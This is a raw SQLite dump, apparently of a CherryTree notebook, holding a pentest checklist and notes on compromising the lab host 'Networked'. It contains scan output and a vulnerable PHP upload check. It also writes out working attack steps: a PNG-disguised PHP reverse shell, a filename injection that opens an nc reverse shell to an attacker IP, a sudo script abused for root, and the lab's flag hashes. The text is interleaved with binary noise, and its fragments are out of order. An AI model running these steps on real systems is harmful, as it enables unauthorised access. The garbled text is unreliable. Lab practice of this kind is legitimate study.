SQLite format 3@ -  Y/Cindexsqlite_autoindex_children_1children tableimageimageCREATE TABLE image ( node_id INTEGER, offset INTEGER, justification TEXT, anchor TEXT, png BLOB, filename TEXT, link TEXT, time INTEGER ) wtablegridgridCREATE TABLE grid ( node_id INTEGER, offset INTEGER, justification TEXT, txt TEXT, col_min INTEGER, col_max INTEGER )btablecodeboxcodeboxCREATE TABLE codebox ( node_id INTEGER, offset INTEGER, justification TEXT, txt TEXT, syntax TEXT, width INTEGER, height INTEGER, is_width_pix INTEGER, do_highl_bra INTEGER, do_show_linenum INTEGER )mtablenodenodeCREATE TABLE node ( node_id INTEGER UNIQUE, name TEXT, txt TEXT, syntax TEXT, tags TEXT, is_ro INTEGER, is_richtxt INTEGER, has_codebox INTEGER, has_table INTEGER, has_image INTEGER, level INTEGER, ts_creation INTEGER, ts_lastsave INTEGER )';indexsqlite_autoindex_node_1node k '  "CMScustom-colors$A[Y)A[Y}xn'  !WebDavcustom-colors$A[W;A[X2v)'  Dirb\DirBustercustom-colors$A?&xA[V1 m'  Niktocustom-colors$A?&oA?&l%'  Web Servicescustom-colors"A?&Nk'  UDPcustom-colors$A?&ЍA[?Lk'  TCPcustom-colors$A?&A[>CXk#'  Enumerationcustom-colors*A?&s.=ui' 10.x.x.x In the upload.php file: if (!(check_file_type($_FILES[ "myFile&qu&'  "Ccq'  TCPnmap -sC -sV -Pn -oA ./networked 10.10.10.146I)''  Dirb\DirBustergobuster dir -w /usr/share/dirb/wordlists/big.txt -u http://10.10.10.146custom-colors$A?&oA?&k'  UDPcustom-colors$A?&ЍA[?Lm'  TCPcustom-colors$A?&A[>CXk#'  Enumerationcustom-colors*A?&s.=u n$Lk '  "CMScustom-colors$A[Y)A[Y}xn'  !WebDavcustom-colors$A[W;A[X2l'   Othercustom-colorsA[EϯA[Tci '  DBcustom-colorsA[EA[Selk '  SNMPcustom-colorsA[DԢA[G!Bj '  SMBcustom-colorsA[PA[DNn )'  Other Servicescustom-colorsXA[Ad 9k/S'  Post ExploitationShell as Apache. Lateral to Guly using the 3 minute cron job check_attack.php c'%w'  ExploitationService Exploited: Vulnerability Type: Exploit POC: Description: Discovery of Vulnerability Exploit Code Used echo '89 50 4E 47 0D 0A 1A 0A' | xxd -p -r > networkshell.php.png cat ./php-reverse-shell.php >> networkshell.php.png Proof\Local.txt File ☐ Screenshot with ifconfig\ipconfig ☐ Submit too OSCP Exam Panel custom-colors,Aףy #/]'  Running ProcessesShell as Apache. Lateral to Guly using the 3 minute cron job check_attack.php cd /var/www/html/uploads touch ';nc 10.10.14.27 4444 -c bash' Gets to GULY shellcustom-colors*Aף zv)'  Script Resultscustom-colorsXAIZ|xAIǃZ-U'  Host InformationOperating System Architecture Domain Installed Updates custom-colors$A[4* OO\O G'   NetworkIPConfig\IFConfig Network Processes ARP DNS Routecustom-colors$A[*܁p)'   Users & GroupsUsers Groupscustom-colors$A[k׀.9q'   Installed ApplicationsInstalled Applicationscustom-colors$AILg O^ Og'  Goodiescustom-colorsVA?& ch+i'   Priv EscalationService Exploited: Vulnerability Type: Exploit POC: Description: Discovery of Vulnerability Service Exploited: Vulnerability Type: Exploit POC: Description: Discovery of Vul)c'  Scheduled JobsScheduled Taskscustom-colors$ANl -@/'  Proof\Flags\OtherUser - 526cfc2305f17faaacecf212c57d71c5 Root - 0a8ecda83f1d81251099e8ac3d0dcb82custom-colors$Aף3D(#i' MethodologyNetwork Scanning ☐ nmap -sn 10.11.1.* ☐ nmap -sL 10.11.1.* ☐ nbtscan -r 10.11.1.0/24 ☐ smbtree Software Versions Potential Exploitscustom-colorsANlH{xi'  Passwordscustom-colors$A?'!f'   Hashescustom-colors$A?&&ich_text>Individual Host Scanning ☐ nmap --top-ports 20 --open -iL iplist.txt ☐ nmap -sS -A -sV -O -p- ipaddress ☐ nmap -sU ipaddress Service Scanning WebAppNiktodirb ☐ dirbuster ☐ wpscan ☐ dotdotpwn ☐ view source ☐ davtest\cadevar ☐ droopscan ☐ joomscan ☐ LFI\RFI Test Linux\Windows ☐ snmpwalk -c public -v1 ipaddress 1 ☐ smbclient -L //ipaddress ☐ showmount -e ipaddress port ☐ rpcinfo ☐ Enum4Linux Anything Elsenmap scripts (locate *nse* | grep servicename) ☐ hydra ☐ MSF Aux Modules ☐ Download the softward Exploitation ☐ Gather Version Numbes ☐ Searchsploit ☐ Default Creds ☐ Creds Previously Gathered ☐ Download the software Post Exploitation Linux ☐ linux-local-enum.sh ☐ linuxprivchecker.py ☐ linux-exploit-suggestor.sh ☐ unix-privesc-check.py Windows ☐ wpc.exe ☐ windows-exploit-suggestor.py ☐ windows_privesc_check.py ☐ windows-privesc-check2.exe Priv Escalationacesss internal services (portfwd) ☐ add account Windows ☐ List of exploits Linux ☐ sudo su ☐ KernelDB ☐ Searchsploit Final ☐ Screenshot of IPConfig\WhoamI ☐ Copy proof.txt ☐ Dump hashes ☐ Dump SSH Keys ☐ Delete filescustom-colorsANl<A[ڸ., y!=' 10.10.10.146 - Networkedcustom-colorsAףzah  ' Log Bookcustom-colors(AI^ 55/]'  Running ProcessesProcess Listcustom-colors$AIwq&#w'  File SystemWriteable Files\Directories Directory List custom-colors$A[3Qnerability [guly@networked ~]$ sudo -l sudo -l Matching Defaults entries for guly on networked: !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin User guly may run the following commands on networked: (root) NOPASSWD: /usr/local/sbin/changename.sh Exploit Code Used #!/bin/bash -p cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF DEVICE=guly0 ONBOOT=no NM_CONTROLLED=no EoF regexp= "^[a-zA-Z0-9_\ /-]+$" for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do echo "interface $var :" read x while [[ ! $x =~ $regexp ]]; do echo "wrong input, try again" echo "interface $var :" read x done echo $var = $x >> /etc/sysconfig/network-scripts/ifcfg-guly done /sbin/ifup guly0 [guly@networked ~]$ sudo /usr/local/sbin/changename.sh sudo /usr/local/sbin/changename.sh interface NAME: abc /bin/bash abc /bin/bash interface PROXY_METHOD: abc abc interface BROWSER_ONLY: abc abc interface BOOTPROTO: abc abc [root@networked network-scripts]# ifconfig ifconfig bash: ifconfig: command not found [root@networked network-scripts]# whoami whoami root Proof\Local.txt File ☐ Screenshot with ifconfig\ipconfig ☐ Submit too OSCP Exam Panel custom-colorsAףb~ot; ]) && filesize($_FILES[ 'myFile' ][ 'tmp_name' ])< 60000 )) { echo '<pre>Invalid image file.</pre>' ; displayform(); } In the lib.php file: function check_file_type ($file) { $mime_type = file_mime_type($file); if (strpos($mime_type, 'image/' ) === 0 ) { return true ; } else { return false ; } } if (function_exists( 'mime_content_type' )) { $file_type = @mime_content_type($file[ 'tmp_name' ]); if (strlen($file_type) > 0 ) { return $file_type; } } list ($foo,$ext) = getnameUpload($myFile[ "name" ]); $validext = array ( '.jpg' , '.png' , '.gif' , '.jpeg' ); $valid = false ; foreach ($validext as $vext) { if (substr_compare($myFile[ "name" ], $vext, -strlen($vext)) === 0 ) { $valid = true ; } } $name = str_replace( '.' , '_' ,$_SERVER[ 'REMOTE_ADDR' ]). '.' .$ext; custom-colors"Aף`xt> =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.10.146 [+] Threads: 10 [+] Wordlist: /usr/share/dirb/wordlists/big.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/04/08 11:24:33 Starting gobuster =============================================================== /.htaccess (Status: 403) /.htpasswd (Status: 403) /backup (Status: 301) /cgi-bin/ (Status: 403) /uploads (Status: 301) =============================================================== 2020/04/08 11:26:40 Finished =============================================================== custom-colors$A?&xAף{T" Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-08 11:20 EDT Nmap scan report for 10.10.10.146 Host is up (0.064s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4 (protocol 2.0) | ssh-hostkey: | 2048 22:75:d7:a7:4f:81:a7:af:52:66:e5:27:44:b1:01:5b (RSA) | 256 2d:63:28:fc:a2:99:c7:d4:35:b9:45:9a:4b:38:f9:c8 (ECDSA) |_ 256 73:cd:a0:5b:84:10:7d:a7:1c:7c:61:1d:f5:54:cf:c4 (ED25519) 80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16) |_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16 |_http-title: Site doesn't have a title (text/html; charset=UTF-8). 443/tcp closed https Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 26.21 seconds custom-colors$A?&Aףz